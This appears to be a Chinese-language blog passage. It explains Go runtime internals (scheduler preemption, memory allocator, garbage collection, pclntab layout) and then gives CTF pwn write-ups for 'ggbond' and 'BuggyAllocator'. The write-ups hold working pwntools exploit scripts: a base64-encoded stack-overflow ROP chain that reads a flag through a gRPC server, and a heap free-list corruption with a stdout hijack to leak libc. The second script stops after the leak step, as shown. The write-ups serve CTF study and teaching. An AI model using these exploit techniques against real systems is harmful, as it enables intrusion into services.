unlock(&forcegc.lock)
}
if debug.schedtrace > 0 && lasttrace+int64(debug.schedtrace)*1000000 <= now {
lasttrace = now
schedtrace(debug.scheddetail > 0)
}
unlock(&sched.sysmonlock)
}
}
  • 如果检测到某个 P 的状态为 Prunning,并且它已经运行了超过10ms,则会将 P 的当前的 G 的 stackguard 设置为 StackPreempt
  • 这个操作其实是相当于加上一个标记,通知这个 G 在合适时机进行调度

内存管理

go 是一门带垃圾回收的语言,go 内存管理机制主要有两个方面:

  • 一个方面是内存池
  • 一个方面是垃圾回收

内存池

go 的内存分配器采用了跟 tcmalloc 库相同的实现,是一个带内存池的分配器,底层直接调用操作系统的 mmap 等函数

  • 在多线程方面,每条线程都有自己的本地的内存,当某个线程中内存不足后就向全局分配链中申请内存
  • 在避免内存碎片方面,大块内存直接按页为单位分配,小块内存会切成各种不同的固定大小的块,申请做任意字节内存时会向上取整到最接近的块,将整块分配给申请者以避免随意切割

go 中为每个系统线程分配一个本地的 MCache(结构体 M 中的 MCache 域)

  • 少量的地址分配就直接从 MCache 中分配,并且定期做垃圾回收
  • 大对象直接从全局控制堆上以页(4k)为单位进行分配

分配器的数据结构包括:

  • FixAlloc:固定大小(128kB)的对象的空闲链分配器,被分配器用于管理存储
  • MHeap:分配堆,按页的粒度进行管理(4kB)
  • MSpan:一些由 MHeap 管理的页(分配内存时的基本单元),会切分为等大的内存块
  • MCentral:对于给定尺寸类别的共享的 free list(本质上是空闲列表)
  • MCache:用于小对象的每 M 一个的 cache

垃圾收集

go 语言的垃圾收集有两个策略:

  • 标记清扫算法(go-1.3)
    • 判断一个对象是否为垃圾(从 root 区域的对象是否有直接或间接的引用到这个对象)
    • 开始标记,从根对象出发查找并标记堆中所有存活的对象
    • 遍历堆中的全部对象,回收未被标记的垃圾对象并将回收的内存加入空闲链表
  • 三色标记法(go-1.5)
    • 黑色 Black:表示对象是可达的,即使用中的对象,黑色是已经被扫描的对象
    • 灰色 Gary:表示被黑色对象直接引用的对象,但还没对它进行扫描
    • 白色 White:白色是对象的初始颜色,如果扫描完成后,对象依然还是白色的,说明此对象是垃圾对象
    • 三色标记规则:黑色不能指向白色对象,即黑色可以指向灰色,灰色可以指向白色
  • 增量收集器(go-1.8)
    • 三色标记 + 混合写屏障

运行时符号信息

go 语言 panic 时会有 traceback,不仅有函数调用,还有文件名和行号等信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package main

import "fmt"

func main() {
defer func() {
fmt.Println("test")
}()

var i = 1
var j = 0
if j == 0 {
panic("err") /* panic会导致程序提前返回,同时调用defer语句 */
}
k := i / j
fmt.Printf("%d / %d = %d\n", i, j, k)
}
1
2
3
4
5
6
test
panic: err

goroutine 1 [running]:
main.main()
/home/yhellow/桌面/gotest/test.go:13 +0x49

虽然 C 语言的 assert 也能实现这个效果,但底层原理完全不同:

1
__assert_fail("0", "test.c", 8u, "main");
  • C 语言编译器直接将要输出的数据写入 __assert_fail 函数

pclntab 简析

编译器在编译的时候会生成一些额外信息(会记录下函数地址对应的源文件行号,也就是 pc->line 的一张表,简称 pclntab),运行时符号信息就是这样生成的

pclntab 全名是 Program Counter Line Table 程序计数器行数映射表,概要结构如下:

  • Magic Number:魔数
  • instruction size quantum
  • ptr size
  • functions number:函数数量
  • srcfile count number:源文件数量
  • text section start addr:代码段基址
  • func names table offset:函数名称表偏移
  • src file table offset:源码路径表偏移
  • pc table offset:PC表偏移
  • func table offset:函数表偏移

使用 go_parser-master 处理后的 IDA 分析数据如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.gopclntab:00000000004B8220 F1 FF FF FF                   runtime_symtab dd 0FFFFFFF1h            ; DATA XREF: LOAD:0000000000400398↑o
.gopclntab:00000000004B8220 ; .noptrdata:runtime_firstmoduledata↓o
.gopclntab:00000000004B8220 ; Magic Number
.gopclntab:00000000004B8224 00 00 dw 0
.gopclntab:00000000004B8226 01 db 1 ; instruction size quantum
.gopclntab:00000000004B8227 08 db 8 ; ptr size
.gopclntab:00000000004B8228 9B 05 00 00 00 00 00 00 dq 59Bh ; Functions number
.gopclntab:00000000004B8230 B1 00 00 00 00 00 00 00 dq 0B1h ; srcfile count number
.gopclntab:00000000004B8238 00 10 40 00 00 00 00 00 dq offset internal_cpu_Initialize ; text section start addr, =firstmoduladata.text
.gopclntab:00000000004B8240 60 00 00 00 00 00 00 00 dq 60h ; func names table offset, real addr: 0x4b8280
.gopclntab:00000000004B8248 A0 C1 00 00 00 00 00 00 dq 0C1A0h ; Source file table addr: 0x4c4b60
.gopclntab:00000000004B8250 40 C9 00 00 00 00 00 00 dq 0C940h ; src file table offset, real addr: 0x4c4b60
.gopclntab:00000000004B8258 C0 E3 00 00 00 00 00 00 dq 0E3C0h ; pc table offset, real addr: 0x4c65e0
.gopclntab:00000000004B8260 00 A9 03 00 00 00 00 00 dq 3A900h ; func table offset, real addr: 0x4f2b20

每个函数都可以拥有一些元数据和 PC-Value 表,运行时符号信息由编译器在编译的时候生成,存放在可执行文件中,当程序被执行时,这张表被加载到内存,用于程序运行时辅助 go 的运行时库执行一些处理

一个函数符号表的形式就是一张 PC 的查找表,IDA 分析数据如下:

1
2
3
4
5
6
7
8
9
10
.gopclntab:00000000004F2B20 00 00 00 00                   runtime_functab dd 0                    ; DATA XREF: .noptrdata:0000000000517D28↓o
.gopclntab:00000000004F2B20 ; .noptrdata:0000000000517D40↓o
.gopclntab:00000000004F2B20 ; Function internal_cpu_Initialize @ 0x401000
.gopclntab:00000000004F2B24 E0 2C 00 00 dd 2CE0h ; Func Struct @ 0x4f5800
.gopclntab:00000000004F2B28 60 00 00 00 dd 60h ; Function internal_cpu_processOptions @ 0x401060
.gopclntab:00000000004F2B2C 38 2D 00 00 dd 2D38h ; Func Struct @ 0x4f5858
.gopclntab:00000000004F2B30 C0 05 00 00 dd 5C0h ; Function internal_cpu_doinit @ 0x4015c0
.gopclntab:00000000004F2B34 90 2D 00 00 dd 2D90h ; Func Struct @ 0x4f58b0
.gopclntab:00000000004F2B38 40 0E 00 00 dd 0E40h ; Function internal_cpu_cpuid @ 0x401e40
.gopclntab:00000000004F2B3C D8 2D 00 00 dd 2DD8h ; Func Struct @ 0x4f58f8
  • 第一个条目是函数地址,第二个条目是 Func Struct(用于描述该函数的信息)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
.gopclntab:00000000004F5800 00 00 00 00                   dd 0                                    ; Func Entry @ 0x401000
.gopclntab:00000000004F5804 00 00 00 00 dd 0
.gopclntab:00000000004F5808 10 00 00 00 dd 10h ; args
.gopclntab:00000000004F580C 00 00 00 00 dd 0 ; deferreturn
.gopclntab:00000000004F5810 01 00 00 00 dd 1 ; pcsp
.gopclntab:00000000004F5814 08 00 00 00 dd 8 ; pcfile
.gopclntab:00000000004F5818 0B 00 00 00 dd 0Bh ; pcln
.gopclntab:00000000004F581C 04 00 00 00 dd 4 ; npcdata
.gopclntab:00000000004F5820 00 00 00 00 dd 0 ; cuOffset
.gopclntab:00000000004F5824 7D 00 00 00 dd 7Dh ; startline
.gopclntab:00000000004F5828 00 db 0 ; func_type: normal
.gopclntab:00000000004F5829 00 db 0 ; func_flag
.gopclntab:00000000004F582A 00 db 0
.gopclntab:00000000004F582B 07 db 7 ; nfuncdata
  • 在 go 源码中对应的结构体如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
type _func struct {
sys.NotInHeap // Only in static data

entryOff uint32 // start pc, as offset from moduledata.text/pcHeader.textStart
nameOff int32 // function name, as index into moduledata.funcnametab.

args int32 // in/out args size
deferreturn uint32 // offset of start of a deferreturn call instruction from entry, if any.

pcsp uint32
pcfile uint32
pcln uint32
npcdata uint32
cuOffset uint32 // runtime.cutab offset of this function's CU
startLine int32 // line number of start of function (func keyword/TEXT directive)
funcID abi.FuncID // set for certain special runtime functions
flag abi.FuncFlag
_ [1]byte // pad
nfuncdata uint8 // must be last, must end on a uint32-aligned boundary

// The end of the struct is followed immediately by two variable-length
// arrays that reference the pcdata and funcdata locations for this
// function.

// pcdata contains the offset into moduledata.pctab for the start of
// that index's table. e.g.,
// &moduledata.pctab[_func.pcdata[_PCDATA_UnsafePoint]] is the start of
// the unsafe point table.
//
// An offset of 0 indicates that there is no table.
//
// pcdata [npcdata]uint32

// funcdata contains the offset past moduledata.gofunc which contains a
// pointer to that index's funcdata. e.g.,
// *(moduledata.gofunc + _func.funcdata[_FUNCDATA_ArgsPointerMaps]) is
// the argument pointer map.
//
// An offset of ^uint32(0) indicates that there is no entry.
//
// funcdata [nfuncdata]uint32
}

ggbond

1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=ToABmmiACyxYP6ANjPii/mBNQG9mzJa6bIWHLsokK/NmmbD1vsv7bojlz5M5b8/uc_h6deBc8Nkqg4RmiJv, stripped
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,NX,FORTIFY

程序分析

程序是一个 gRPC 服务器,先使用 /pbtk/extractors/from_binary.py 来获取其 proto 文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
syntax = "proto3";

package GGBond;

option go_package = "./;ggbond";

service GGBondServer {
rpc Handler(Request) returns (Response);
}

message Request {
oneof request { // neof字段被解释成枚举类型
WhoamiRequest whoami = 100;
RoleChangeRequest role_change = 101;
RepeaterRequest repeater = 102;
}
}

message Response {
oneof response {
WhoamiResponse whoami = 200;
RoleChangeResponse role_change = 201;
RepeaterResponse repeater = 202;
ErrorResponse error = 444;
}
}

message WhoamiRequest {

}

message WhoamiResponse {
string message = 2000;
}

message RoleChangeRequest {
uint32 role = 1001;
}

message RoleChangeResponse {
string message = 2001;
}

message RepeaterRequest {
string message = 1002;
}

message RepeaterResponse {
string message = 2002;
}

message ErrorResponse {
string message = 4444;
}
  • 服务端内置模块为 Handler,其中有3个子功能

使用如下命令编译 proto 文件:

1
python3 -m grpc_tools.protoc -I ./ --python_out=./ --grpc_python_out=. ./ggbond.proto

在开始分析程序前建议用 AlphaGolang 恢复符号

在 RegisterService 函数前断点,开始调试分析:

1
2
3
4
.text:00000000007EE21A 48 8B 0D 8F D1 18 00          mov     rcx, cs:off_97B3B0
.text:00000000007EE221 48 8D 1D 38 B6 46 00 lea rbx, off_C59860 ; "GGBond.GGBondServer"
.text:00000000007EE228 48 8D 3D E1 6A 4A 00 lea rdi, unk_C94D10
.text:00000000007EE22F E8 CC 47 FE FF call google_golang_org_grpc__Server_RegisterService

打印其第二个参数(RBX)的数据,该参数其实是 ServiceDesc 对象,源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
type ServiceDesc struct {
ServiceName string
// The pointer to the service interface. Used to check whether the user
// provided implementation satisfies the interface requirements.
HandlerType any
Methods []MethodDesc
Streams []StreamDesc
Metadata any
}

type MethodDesc struct {
MethodName string
Handler methodHandler
}

type StreamDesc struct {
StreamName string
Handler StreamHandler

ServerStreams bool
ClientStreams bool
}
  • MethodDesc 中存储有我们注册的函数
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xc59860
00:0000│ rbx 0xc59860 —▸ 0x8d7742 ◂— 0x472e646e6f424747 ('GGBond.G') /* ServiceName */
01:00080xc59868 ◂— 0x13
02:00100xc59870 —▸ 0x81aba0 ◂— 0x8
03:00180xc59878 ◂— 0x0
04:00200xc59880 —▸ 0xc525c0 —▸ 0x8cff19 ◂— 0x4872656c646e6148 ('HandlerH') /* MethodDesc */
05:00280xc59888 ◂— 0x1
06:00300xc59890 ◂— 0x1
07:00380xc59898 —▸ 0xc94a20 ◂— 0x1010101010101
  • 打印 MethodDesc 的数据如下:
1
2
3
4
5
6
pwndbg> telescope 0xc525c0
00:00000xc525c0 —▸ 0x8cff19 ◂— 0x4872656c646e6148 ('HandlerH')
01:00080xc525c8 ◂— 0x7
02:00100xc525d0 —▸ 0x90bd28 —▸ 0x7ed300 ◂— lea r12, [rsp - 2e8h]
03:00180xc525d8 ◂— 0x0
... ↓ 4 skipped
  • 地址 0x7ed300 所在的函数即是目标函数的 handler:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
void *__fastcall main_ggbond__GGBondServer_Handler_Handler(
__int64 a1,
__int64 (**a2)(void),
__int64 a3,
__int64 a4,
__int64 (**a5)(void))
{
__int64 v5; // rax
__int64 v6; // rbx
__int64 v7; // r14
char *v8; // rcx
__int64 i; // rax
_QWORD *v10; // rax
_QWORD *v11; // rax
__int64 v13; // rax
char v14[80]; // [rsp+40h] [rbp-338h] BYREF
char v15; // [rsp+90h] [rbp-2E8h] BYREF
_QWORD *v16; // [rsp+340h] [rbp-38h]
__int64 v17; // [rsp+348h] [rbp-30h]
__int64 v18; // [rsp+350h] [rbp-28h]
char *v19; // [rsp+358h] [rbp-20h]
__int64 v20; // [rsp+360h] [rbp-18h]
__int64 v21; // [rsp+368h] [rbp-10h]

if ( (unsigned __int64)&v15 <= *(_QWORD *)(v7 + 16) )
runtime_morestack_noctxt();
v18 = v5;
v17 = runtime_newobject();
if ( (*a2)() )
return 0LL;
if ( a5 )
{
v10 = (_QWORD *)runtime_newobject();
*v10 = v18;
if ( dword_C95060 )
v10 = (_QWORD *)runtime_gcWriteBarrierDX();
else
v10[1] = v6;
v16 = v10;
v10[3] = 28LL;
v10[2] = "/GGBond.GGBondServer/Handler";
v11 = (_QWORD *)runtime_newobject();
*v11 = sub_7ED5C0;
v11[1] = v18;
if ( dword_C95060 )
runtime_gcWriteBarrierR9();
else
v11[2] = v6;
return (void *)(*a5)();
}
else
{
((void (*)(void))loc_468D3C)();
v19 = v14;
v20 = 768LL;
v21 = 768LL;
v8 = v14;
for ( i = 0LL; i < 16; ++i )
*v8++ = 16;
v13 = runtime_assertE2I();
(*(void (**)(void))(v13 + 24))(); /* 调用目标函数 */
return &unk_8A32C0;
}
}
  • 我们直接在调用目标函数的地方打断点(b* 0x7ED545),查看目标函数的位置:
1
0x7ed545    call   rdx                           <0x7ed860>
  • 这里的 0x7ed860 即使目标函数的地址

漏洞分析

找到服务端注册函数的位置后,我们可以开始漏洞分析:

  • 程序内置了4个 role(编号为:0,1,2,3)
  • 通过 whoami 命令可以查看当前的 role
  • 通过 role_change 命令则可以切换 role
  • 通过 repeater 可以发送一条长数据(没有限制长度)

漏洞点如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
if ( qword_C94B80 == 3 ) /* 如果role编号为'3' */
{
v51 = runtime_newobject();
v18 = (_QWORD *)runtime_newobject();
v55 = v18;
if ( dword_C95060 )
runtime_gcWriteBarrierCX();
else
*v18 = v51;
v19 = runtime_newobject();
v20 = &off_979A60;
*(_QWORD *)(v19 + 40) = &off_979A60;
if ( dword_C95060 )
v19 = runtime_gcWriteBarrierDX();
else
*(_QWORD *)(v19 + 48) = v55;
v21 = *(_QWORD *)(v19 + 48);
if ( *(void ***)(v19 + 40) != v20 )
runtime_panicdottypeI();
if ( (unsigned __int64)qword_C525A8 <= 3 )
runtime_panicIndex();
v45 = v19;
v57 = (__int64 *)v21;
v22 = off_C525A0[6];
v23 = runtime_concatstring2();
v24 = *v57;
*(_QWORD *)(*v57 + 48) = v22;
if ( dword_C95060 )
runtime_gcWriteBarrier();
else
*(_QWORD *)(v24 + 40) = v23;
if ( *(void ***)(a1 + 40) != &off_9799C0 )
runtime_panicdottypeI();
v25 = **(_QWORD **)(a1 + 48);
v43 = *(_QWORD *)(v25 + 48);
v26 = *(_QWORD *)(v25 + 40);
v59 = (_BYTE *)encoding_base64__Encoding_DecodeString();
v60 = v26;
v61 = v27;
v44[0] = v2;
v44[1] = v2;
v62 = v44;
v63 = 32LL;
v64 = 32LL;
v28 = v44;
v29 = v59;
for ( i = 0LL; i < (__int64)(3 * (v43 >> 2)); ++i ) /* 往栈中填写数据 */
{
*(_BYTE *)v28 = *v29;
v28 = (__int128 *)((char *)v28 + 1);
++v29;
}
return v45;
}
  • 程序对 “role编号为3” 这种情况进行了特殊处理,并且往栈中填写了传入数据(栈溢出)

入侵思路

有了栈溢出就可以构造 ORW 链(没法在服务端上直接获取 shell)

  • 注意:传入的数据会进行 base64 加密,因此实际偏移应该是 0xc8

由于 go 的内置函数是使用栈来传参的,因此需要一个 gadget 来为 ORW 链恢复栈帧

1
2
3
4
5
6
  0x469e60    mov    edi, 0ffffff9ch
0x469e65 mov rsi, qword ptr [rsp + 8]
0x469e6a mov edx, dword ptr [rsp + 10h]
0x469e6e mov r10d, dword ptr [rsp + 14h]
0x469e73 mov eax, 101h
0x469e78 syscall <SYS_openat>

可以使用 ROPgadget 来进行查找:

1
ROPgadget --binary ./pwn --only "add|ret" | grep "rsp"
1
0x000000000040295a : add rsp, 0x20 ; ret

我们不能直接在服务端上 write flag,这里有两种思路:

  • 重新构建 socket 将 flag 传送到客户端
  • 将 flag 拷贝到响应数据中,借用程序的代码发送数据

经过尝试发现这两种方式都不好实现,查看网上 wp 时发现了另一种方式,通过现成的 socket 传输 flag

  • 这样会导致结构错误从而使 python 没法处理数据,但是我们可以直接抓包获取 flag
  • 除此以外还有另一种方法:
1
2
p = remote("127.0.0.1", 23334)
conn = grpc.insecure_channel('localhost:23334')
  • 这两个虽然是不同的连接,但 p.recv 仍然可以接受 conn 的数据(可能底层就是抓取数据包)
1
2
3
4
5
6
7
8
try:
response: pb2.RepeaterResponse = client.Handler(
pb2.Request(
repeater=pb2.RepeaterRequest(message=b64encode(payload).decode())
)
)
except:
print(p.recv(0x1000))

于是便可以直接 ORW

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# -*- coding:utf-8 -*-
from pwn import *
import grpc
import ggbond_pb2 as pb2
import ggbond_pb2_grpc as pb2_grpc
from base64 import b64encode

arch = 64
challenge = './pwn'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
pause()

def cmd(op):
sla(">",str(op))

open_go = 0x469E60
write_go = 0x478e20
read_go = 0x469EE0
sendto_go = 0x47A500
flag_addr = 0x7F058B+1
add_rsp_ret = 0x000000000040295a
pop_rdi_ret = 0x0000000000401537
pop_rsi_ret = 0x0000000000422398
pop_rdx_ret = 0x0000000000461bd1
pop_rax_ret = 0x00000000004101e6
pop_rbx_ret = 0x0000000000401a41
pop_rcx_ret = 0x00000000004cc7e3
syscall_ret = 0x000000000046a034
return_addr = 0x7ed500

def pwn():
p = remote("127.0.0.1", 23334)
conn = grpc.insecure_channel('localhost:23334')
client = pb2_grpc.GGBondServerStub(channel=conn)

response: pb2.WhoamiResponse = client.Handler(
pb2.Request(
whoami=pb2.WhoamiRequest()
)
)
print(response)

response: pb2.RoleChangeResponse = client.Handler(
pb2.Request(
role_change=pb2.RoleChangeRequest(role=3)
)
)
print(response)

payload = b"a"*0xc8
payload += p64(open_go)
payload += p64(add_rsp_ret)
payload += p64(flag_addr)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(read_go)
payload += p64(add_rsp_ret)
payload += p64(9)
payload += p64(0xc000200000)
payload += p64(0x100)
payload += p64(0)
payload += p64(pop_rax_ret)
payload += p64(1)
payload += p64(pop_rdi_ret)
payload += p64(7)
payload += p64(pop_rsi_ret)
payload += p64(0xc000200000)
payload += p64(pop_rdx_ret)
payload += p64(0x100)
payload += p64(syscall_ret)

try:
response: pb2.RepeaterResponse = client.Handler(
pb2.Request(
repeater=pb2.RepeaterRequest(message=b64encode(payload).decode())
)
)
except:
print(p.recv(0x1000))

pwn()

BuggyAllocator

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.6) stable release version 2.35.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5724ebe3943a39c4ff00f553bc288b5fbb9a2e61, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
  • 64位,dynamically,Full RELRO,Canary,NX

漏洞分析

本题目实现了一个简易的堆分配器

分配逻辑如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
if ( !len )
return 0LL;
if ( len > 0x80 )
return malloc_t(len);
chunk = (char **)&free_list[get_order(len)]; /* 链表数组 */
re = *chunk;
if ( *chunk )
{
*chunk = *(char **)re;
return re;
}
else
{
len_align = do_align(len);
return new_list(len_align);
}
  • 长度大于 0x80 使用 ptmalloc,否则使用程序实现的逻辑
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pwndbg> telescope 0x11b5ea0
00:00000x11b5ea0 ◂— 0x0
01:00080x11b5ea8 ◂— 0x291
02:00100x11b5eb0 —▸ 0x11b5f00 —▸ 0x11b5f10 —▸ 0x11b5f20 —▸ 0x11b5f30 ◂— ...
03:00180x11b5eb8 ◂— 0x3131313131313131 ('11111111')
04:00200x11b5ec0 —▸ 0x11b5eb0 —▸ 0x11b5f00 —▸ 0x11b5f10 —▸ 0x11b5f20 ◂— ...
05:00280x11b5ec8 ◂— 0x3232323232323232 ('22222222')
06:00300x11b5ed0 ◂— 0x3333333333333333 ('33333333')
07:00380x11b5ed8 ◂— 0x3333333333333333 ('33333333')
08:00400x11b5ee0 ◂— 0x3434343434343434 ('44444444')
09:00480x11b5ee8 ◂— 0x3434343434343434 ('44444444')
0a:00500x11b5ef0 ◂— 0x3535353535353535 ('55555555')
0b:00580x11b5ef8 ◂— 0x3535353535353535 ('55555555')
0c:00600x11b5f00 —▸ 0x11b5f10 —▸ 0x11b5f20 —▸ 0x11b5f30 —▸ 0x11b5f40 ◂— ...
0d:00680x11b5f08 ◂— 0x0
  • 先申请一个大缓冲区,然后分割为相同大小的小缓冲区
  • 对于没有使用的空间则会记录 free chunk 链表

程序会维护一个链表数组,并从链表数组中提取 free chunk:

1
2
3
4
pwndbg> telescope 0x404420
00:00000x404420 ◂— 0x0
01:00080x404428 —▸ 0x11b5ec0 —▸ 0x11b5eb0 —▸ 0x11b5f00 —▸ 0x11b5f10 ◂— ...
02:00100x404430 ◂— 0x0

程序会维护一个结构体数组,用于记录已经分配的 chunk:

1
2
3
4
5
6
7
8
pwndbg> telescope 0x4044A0
00:00000x4044a0 ◂— 0x0
... ↓ 4 skipped
05:00280x4044c8 —▸ 0x11b5ed0 ◂— 0x3333333333333333 ('33333333')
06:00300x4044d0 ◂— 0x10
07:00380x4044d8 —▸ 0x11b5ee0 ◂— 0x3434343434343434 ('44444444')
08:00400x4044e0 ◂— 0x10
09:00480x4044e8 —▸ 0x11b5ef0 ◂— 0x3535353535353535 ('55555555')

释放逻辑如下:

1
2
3
4
5
6
7
8
9
10
if ( a2 <= 0x80 )
{
order = get_order(a2);
*a1 = free_list[order];
free_list[order] = a1;
}
else
{
free_s(a1);
}
  • 首先确定目标 chunk 在结构体数组中的位置,然后进行释放
  • 在 free chunk 中记录 free_list[order],并将 free chunk 记录为新的链表头

该漏洞是一个逻辑漏洞,本质原因是因为大缓冲区有部分空间没有第一时间初始化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> telescope 0xe7aea0
00:00000xe7aea0 ◂— 0x0 /* start */
01:00080xe7aea8 ◂— 0x291
02:0010│ r9 0xe7aeb0 ◂— 0x41414141414141 /* 'AAAAAAA' */
03:00180xe7aeb8 ◂— 0x0
04:00200xe7aec0 —▸ 0xe7aed0 —▸ 0xe7aee0 —▸ 0xe7aef0 —▸ 0xe7af00 ◂— ...
05:00280xe7aec8 ◂— 0x0
......
22:01100xe7afb0 —▸ 0xe7afc0 —▸ 0xe7afd0 —▸ 0xe7afe0 ◂— 0x0
23:01180xe7afb8 ◂— 0x0
24:01200xe7afc0 —▸ 0xe7afd0 —▸ 0xe7afe0 ◂— 0x0
25:01280xe7afc8 ◂— 0x0
26:01300xe7afd0 —▸ 0xe7afe0 ◂— 0x0
27:01380xe7afd8 ◂— 0x0 /* 为初始化的free chunk链表 */
......
48:02400xe7b0e0 ◂— 0x0
... ↓ 7 skipped
50:02800xe7b120 ◂— 0x0
... ↓ 2 skipped
53:02980xe7b138 ◂— 0xeed1 /* end */

如果我们提前在未初始化的空间中写入数据,那么程序就会误以为该空间已经初始化过了,从而将我们写入的空间分配出去

入侵思路

程序没有泄露,但 stdout 处于 bss 段可以被劫持,因此首先我们需要劫持 stdout 来泄露数据:

1
2
3
4
pwndbg> telescope 0x404420
00:00000x404420 ◂— 0x0
... ↓ 7 skipped
08:00400x404460 —▸ 0x404040 (stdout) —▸ 0x75458dc1b780 (_IO_2_1_stdout_) ◂— 0xfbad2887
  • 申请两次 chunk 即可修改 _IO_2_1_stdout_

泄露完成以后就是高 libc 利用的过程了:

  • 劫持 libc GOT
  • 劫持 stack
  • 劫持 IO
  • 劫持 exit_hook
  • 劫持 tls_dtor_list_addr

由于我们已经劫持了程序的 free_list,可以进行任意读写,因此这里选择劫持栈

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.35.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')

def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
#pause()

def cmd(op):
sla(">",str(op))

def add(index,size,data):
cmd(1)
sla("idx",str(index))
sla("size",str(size))
sa("Content",data)

def dele(index):
cmd(2)
sla("idx",str(index))

def stdout_leak(start,end):
payload = p64(0xfbad1800)+p64(0)*3
payload += p64(start)+p64(end)
return payload

#debug()

free_list_addr = 0x404420
chunk_list_addr = 0x4044A0
stdout_addr = 0x404040

add(0,0x280,p64(free_list_addr+0x40)*(0x280//8))
dele(0)
for i in range(0x14):
add(i,0x10,chr(ord('A')+i)*7)
add(0x14,0x10,p64(stdout_addr)+p64(free_list_addr+0x40))

add(0x15,0x48,'\x80')
payload = stdout_leak(0x404040,0x404410)
add(0x16,0x48,payload)

ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b'\x00'))
libc_base = leak_addr - 0x21b780
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

ru("\xf0") # 0x1fc6ff0
leak_addr = u64(p.recv(4).ljust(8,b'\x00'))*0x100
heap_base = leak_addr - 0x11f00
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

environ = libc_base + libc.sym['environ']
system = libc_base + libc.sym['system']
success("environ >> "+hex(environ))
success("system >> "+hex(system))

